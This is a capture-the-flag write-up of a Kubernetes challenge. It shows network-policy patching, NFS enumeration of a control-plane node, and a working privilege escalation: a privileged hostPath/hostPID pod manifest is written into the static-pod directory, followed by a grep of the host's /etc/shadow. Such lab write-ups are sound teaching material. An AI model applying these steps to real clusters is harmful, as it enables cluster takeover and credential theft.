  kind: Deployment
  metadata:
    [..SNIP..]
        containers:
        - args:
          - while true; echo 'Trying to steal sensitive data'; kubectl -s flag.secretlocation.svc.cluster.local
            get --raw /; echo ''; do kubectl get secrets; echo ''; sleep 3; done;
          command:
          - /bin/bash
          - -c
          - --
        [..SNIP..]

Right, so this pod tries to get secrets every 3 seconds, and it also tries to connect to a Kubernetes API server at flag.secretlocation.svc.cluster.local. However, that looks like a Kubernetes service within this cluster (inside the cluster, a service’s DNS name is <service>.<namespace>.svc.cluster.local), so there must be another namespace called secretlocation. What permissions do I have there?
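The reasoning about the hostname can be written down as a small parser. A minimal Python sketch, assuming the default cluster domain cluster.local (it is configurable per cluster); the function name is hypothetical. Inside a pod the short form flag.secretlocation also resolves, because the pod’s DNS search list includes svc.cluster.local.

```python
from typing import Optional


def split_service_dns(host: str, cluster_domain: str = "cluster.local") -> Optional[tuple[str, str]]:
    """Split '<service>.<namespace>.svc.<cluster_domain>' into (service, namespace).

    Returns None for anything that is not a plain service name in that domain.
    """
    suffix = f".svc.{cluster_domain}"
    if not host.endswith(suffix):
        return None
    labels = host[: -len(suffix)].split(".")
    if len(labels) != 2 or not all(labels):
        return None
    return labels[0], labels[1]


print(split_service_dns("flag.secretlocation.svc.cluster.local"))
```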

root@entrypoint-64bdf7d89c-z6zjs:/var/log/audit/kube# kubectl -n secretlocation auth can-i --list
Resources                                       Non-Resource URLs   Resource Names       Verbs
selfsubjectreviews.authentication.k8s.io        []                  []                   [create]
selfsubjectaccessreviews.authorization.k8s.io   []                  []                   [create]
selfsubjectrulesreviews.authorization.k8s.io    []                  []                   [create]
nodes                                           []                  []                   [get list]
pods                                            []                  []                   [get list]
deployments.apps                                []                  []                   [get list]
networkpolicies.networking.k8s.io               []                  []                   [get list]
[..SNIP..]
networkpolicies.networking.k8s.io               []                  [deny-all-ingress]   [patch]

Right, OK, so there is probably a network policy blocking all ingress traffic, and we can also see deployments and pods. Let’s relax the network policy to allow traffic from the default namespace (where we are) and see what’s listening on that port. I don’t want to allow all traffic (even though it’d be easier), just in case there’s a trap if I grant access to e88wmxbmdfkvp2h945sgpnk7viy1f9la. I did this by patching the network policy to the following:
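Since we only hold patch on deny-all-ingress, the change has to be expressed as a patch. A minimal Python sketch that builds a JSON merge patch body for kubectl -n secretlocation patch netpol deny-all-ingress --type merge -p '...'. It relies on the kubernetes.io/metadata.name label, which recent Kubernetes versions set automatically on every namespace; the helper name is hypothetical. Note that a merge patch replaces the whole ingress list, which is fine here because the deny-all policy starts with no ingress rules.

```python
import json


def allow_ingress_from_namespace(namespace: str) -> dict:
    """Merge-patch body whose ingress list admits traffic only from `namespace`."""
    return {
        "spec": {
            "ingress": [
                {
                    "from": [
                        {
                            "namespaceSelector": {
                                "matchLabels": {"kubernetes.io/metadata.name": namespace}
                            }
                        }
                    ]
                }
            ]
        }
    }


# The string to pass to `kubectl patch ... --type merge -p`
print(json.dumps(allow_ingress_from_namespace("default")))
```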

root@entrypoint-64bdf7d89c-z6zjs:/var/log/audit/kube# kubectl -n secretlocation get netpol deny-all-ingress -o yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  creationTimestamp: "2024-11-14T17:29:34Z"
  generation: 2
  name: deny-all-ingress
  namespace: secretlocation
  resourceVersion: "11876"
  uid: df194fe6-3b1a-4186-b690-d3e695b2b4b2
spec:
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: default
  podSelector: {}
  policyTypes:
  - Ingress

With that in place, we can now query the service.

root@entrypoint-64bdf7d89c-z6zjs:/var/log/audit/kube# curl -v flag.secretlocation -v; echo
* Host flag.secretlocation:80 was resolved.
* IPv6: (none)
* IPv4: 10.99.248.84
*   Trying 10.99.248.84:80...
* Connected to flag.secretlocation (10.99.248.84) port 80
* using HTTP/1.x
> GET / HTTP/1.1
> Host: flag.secretlocation
> User-Agent: curl/8.11.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx/1.27.2
< Date: Thu, 14 Nov 2024 19:30:44 GMT
< Content-Type: text/html
< Content-Length: 602
< Last-Modified: Thu, 14 Nov 2024 17:30:22 GMT
< Connection: keep-alive
< ETag: "673633ae-25a"
< Accept-Ranges: bytes
<
* Connection #0 to host flag.secretlocation left intact
Initiating a multi-threaded brute-force attack against the target's salted hash tables while leveraging a zero-day buffer overflow exploit to inject a polymorphic payload into the network's mainframe. We'll need to spoof our MAC addresses, reroute traffic through a compromised proxy, and establish a reverse shell connection through an encrypted SSH tunnel. Once inside, we can escalate privileges using a privilege escalation script hidden in a steganographic image payload and exfiltrate data via a covert DNS tunneling technique while obfuscating our footprint with recursive self-deleting scripts.

Well, that’s not a Kubernetes API server. I wonder what I kicked off 🍿 (if anything).

Let’s see what the deployment spec says.

root@entrypoint-64bdf7d89c-z6zjs:/var/log/audit/kube# kubectl -n secretlocation get deployment -o yaml
apiVersion: v1
items:
- apiVersion: apps/v1
  kind: Deployment
  metadata:
    [..SNIP..]
        containers:
        - image: nginx
          imagePullPolicy: Always
          name: flag
          ports:
          - containerPort: 80
            protocol: TCP
          resources:
            limits:
              cpu: 500m
              memory: 128Mi
          terminationMessagePath: /dev/termination-log
          terminationMessagePolicy: File
          volumeMounts:
          - mountPath: /usr/share/nginx/html
            name: flag-config
        dnsPolicy: ClusterFirst
        restartPolicy: Always
        schedulerName: default-scheduler
        securityContext: {}
        terminationGracePeriodSeconds: 30
        volumes:
        - configMap:
            defaultMode: 420
            items:
            - key: index
              path: index.html
            - key: flag
              path: flag
            - key: flag
              path: robots.txt
            name: flag-configmap
          name: flag-config
[..SNIP..]

OK, there is also a robots.txt. Interestingly, both flag and robots.txt are mounted from the same flag key, so I think robots.txt will contain the flag (as will /flag).
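The giveaway is that one configMap key is projected under two filenames. A tiny Python sketch that groups a configMap volume’s items by source key, so keys exposed under more than one path stand out; the items are copied from the deployment above and the function name is hypothetical.

```python
from collections import defaultdict


def paths_by_key(items: list[dict]) -> dict[str, list[str]]:
    """Group configMap volume items as source key -> list of mounted file paths."""
    grouped: dict[str, list[str]] = defaultdict(list)
    for item in items:
        grouped[item["key"]].append(item["path"])
    return dict(grouped)


# volumes[].configMap.items from the flag deployment
items = [
    {"key": "index", "path": "index.html"},
    {"key": "flag", "path": "flag"},
    {"key": "flag", "path": "robots.txt"},
]
# Keys served under more than one filename
print({key: paths for key, paths in paths_by_key(items).items() if len(paths) > 1})
```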

root@entrypoint-64bdf7d89c-z6zjs:/var/log/audit/kube# curl -v flag.secretlocation/robots.txt
* Host flag.secretlocation:80 was resolved.
* IPv6: (none)
* IPv4: 10.99.248.84
*   Trying 10.99.248.84:80...
* Connected to flag.secretlocation (10.99.248.84) port 80
* using HTTP/1.x
> GET /robots.txt HTTP/1.1
> Host: flag.secretlocation
> User-Agent: curl/8.11.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx/1.27.2
< Date: Thu, 14 Nov 2024 19:34:05 GMT
< Content-Type: text/plain
< Content-Length: 48
< Last-Modified: Thu, 14 Nov 2024 17:30:22 GMT
< Connection: keep-alive
< ETag: "673633ae-30"
< Accept-Ranges: bytes
<
* Connection #0 to host flag.secretlocation left intact
flag_ctf{you_found_what_the_good_captain_sought}

Indeed it is.

One more flag. Based on the starting description, there is a security issue somewhere that we need to leverage.

Looking back at our permissions, we had list on network policies. Let’s see what else is there.

root@entrypoint-64bdf7d89c-z6zjs:/var/log/audit/kube# kubectl -n secretlocation get netpol
NAME                       POD-SELECTOR   AGE
allow-egress-to-node-nfs   app=flag       125m
deny-all-ingress           <none>         125m

root@entrypoint-64bdf7d89c-z6zjs:/var/log/audit/kube# kubectl -n secretlocation get netpol allow-egress-to-node-nfs -o yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  creationTimestamp: "2024-11-14T17:29:34Z"
  generation: 1
  name: allow-egress-to-node-nfs
  namespace: secretlocation
  resourceVersion: "703"
  uid: f261bc2a-f8cb-47b3-961a-483f65ec077f
spec:
  egress:
  - ports:
    - port: 111
      protocol: TCP
    - port: 111
      protocol: UDP
    - port: 2049
      protocol: TCP
    - port: 2049
      protocol: UDP
    to:
    - ipBlock:
        cidr: 10.0.0.0/8
  podSelector:
    matchLabels:
      app: flag
  policyTypes:
  - Egress

Oh, there’s an NFS server somewhere?? That’s probably the next step; there’s always an issue with NFS. I started scanning the pod CIDR ranges looking for it before noticing that the policy name specifies it’s on the node. That’s probably why we have the get/list permissions on nodes: so we can find a node IP.

root@entrypoint-64bdf7d89c-z6zjs:~# kubectl get nodes -o wide
NAME       STATUS   ROLES           AGE    VERSION   INTERNAL-IP    EXTERNAL-IP   OS-IMAGE             KERNEL-VERSION   CONTAINER-RUNTIME
master-1   Ready    control-plane   141m   v1.31.2   10.0.245.109   <none>        Ubuntu 22.04.5 LTS   6.8.0-1015-aws   containerd://1.7.7
node-1     Ready    <none>          141m   v1.31.2   10.0.252.55    <none>        Ubuntu 22.04.5 LTS   6.8.0-1015-aws   containerd://1.7.7
node-2     Ready    <none>          141m   v1.31.2   10.0.187.131   <none>        Ubuntu 22.04.5 LTS   6.8.0-1015-aws   containerd://1.7.7

Now that we have some internal IPs, let’s use the binaries from libnfs-utils to explore a share.
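The egress policy only applies to pods labelled app=flag, but its ipBlock still hints at where the NFS server lives. A quick Python sanity check that the node InternalIPs above fall inside the policy’s 10.0.0.0/8 block; the node list is copied from the kubectl output and the function name is hypothetical.

```python
import ipaddress

# ipBlock from allow-egress-to-node-nfs (ports 111 and 2049, TCP and UDP)
ALLOWED_CIDR = ipaddress.ip_network("10.0.0.0/8")

# InternalIPs from `kubectl get nodes -o wide`
NODES = {
    "master-1": "10.0.245.109",
    "node-1": "10.0.252.55",
    "node-2": "10.0.187.131",
}


def nodes_in_block(nodes: dict[str, str], cidr=ALLOWED_CIDR) -> list[str]:
    """Names of nodes whose InternalIP falls inside the given network."""
    return [name for name, ip in nodes.items() if ipaddress.ip_address(ip) in cidr]


print(nodes_in_block(NODES))
```

All three nodes qualify, so the range alone doesn’t pick one; trying the control-plane node first is a reasonable guess.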

root@entrypoint-64bdf7d89c-z6zjs:~# nfs-ls nfs://10.0.245.109/
Failed to mount nfs share : mount_cb: RPC error: Mount failed with error MNT3ERR_ACCES(13) Permission denied(13)

root@entrypoint-64bdf7d89c-z6zjs:~# nfs-ls nfs://10.0.245.109/?version=4
drwxr-xr-x  13  0  0  4096 var
drwxr-xr-x 101  0  0  4096 etc

Excellent, we have two folders: /etc and /var. Enumerating /var/ just revealed audit logs, and I realised the logs I had originally been looking at came from this NFS share in the first place xD. I could have gone straight to the share from the get-go.

In /etc/ we have the Kubernetes manifests folder.

root@entrypoint-64bdf7d89c-z6zjs:~# nfs-ls nfs://10.0.245.109/etc?version=4
drwxrwxr-x  4  0  0  4096 kubernetes

root@entrypoint-64bdf7d89c-z6zjs:~# nfs-ls nfs://10.0.245.109/etc/kubernetes/?version=4
drwxrwxr-x  2  0  0  4096 manifests

root@entrypoint-64bdf7d89c-z6zjs:~# nfs-ls nfs://10.0.245.109/etc/kubernetes/manifests?version=4
-rw-------  1  0  0  1463 kube-scheduler.yaml
-rw-------  1  0  0  2539 etcd.yaml
-rw-r--r--  1  0  0     0 .kubelet-keep
-rw-------  1  0  0  3279 kube-controller-manager.yaml
-rw-------  1  0  0  4424 kube-apiserver.yaml

The manifests folder is where the kubelet looks for static pods to run. If we have write permissions here, we can deploy our own privileged pod. Remembering back, we have exec permissions in the dodgy namespace, so let’s aim for a privileged pod on the master node in that namespace.

root@entrypoint-64bdf7d89c-z6zjs:~# cat pod.yml
apiVersion: v1
kind: Pod
metadata:
  name: skybound
  namespace: e88wmxbmdfkvp2h945sgpnk7viy1f9la
spec:
  tolerations:
  - key: node-role.kubernetes.io/master
    operator: Exists
    effect: NoSchedule
  hostNetwork: true
  nodeName: master-1
  hostPID: true
  containers:
  - name: testing
    image: skybound/net-utils
    imagePullPolicy: IfNotPresent
    args: ["sleep", "100d"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /

root@entrypoint-64bdf7d89c-z6zjs:~# nfs-cp pod.yml nfs://10.0.245.109/etc/kubernetes/manifests/pod.yaml?version=4
copied 540 bytes

Nice, it uploaded. Eventually the pod is deployed, and we get a shell in a privileged pod on the master node.
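Static pods are started by the kubelet that reads the manifest directory, not by the scheduler, and the API server only shows a mirror pod named after the pod with the node name appended. That is why the pod appears as skybound-master-1 rather than skybound. A tiny Python sketch of that naming rule and the resulting exec command (helper names are hypothetical):

```python
def mirror_pod_name(pod_name: str, node_name: str) -> str:
    """Name under which the API server exposes a static pod's mirror pod."""
    return f"{pod_name}-{node_name}"


def exec_argv(namespace: str, pod_name: str, node_name: str, shell: str = "bash") -> list[str]:
    """kubectl argv for an interactive shell in a static pod's mirror pod."""
    target = mirror_pod_name(pod_name, node_name)
    return ["kubectl", "-n", namespace, "exec", "-it", target, "--", shell]


print(" ".join(exec_argv("e88wmxbmdfkvp2h945sgpnk7viy1f9la", "skybound", "master-1")))
```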

root@entrypoint-64bdf7d89c-z6zjs:~# kubectl -n e88wmxbmdfkvp2h945sgpnk7viy1f9la exec -it skybound-master-1 -- bash
root@master-1:/#

Let’s enumerate and try to find the flag, which eventually turns up in /etc/.

root@master-1:/# grep -ri flag_ctf /host/etc/
/host/etc/shadow:# flag_ctf{old_misconfigurations_still_work_in_cloud_native_spaces}

And there’s the final flag.

Conclusion

Thank you ControlPlane for running this CTF. I was not expecting to randomly encounter NFS. This round, SIG Security also took part in the background, and it was definitely fun to sit in and listen to what they were doing.

Looking at the leaderboard, congratulations to kyle for coming first!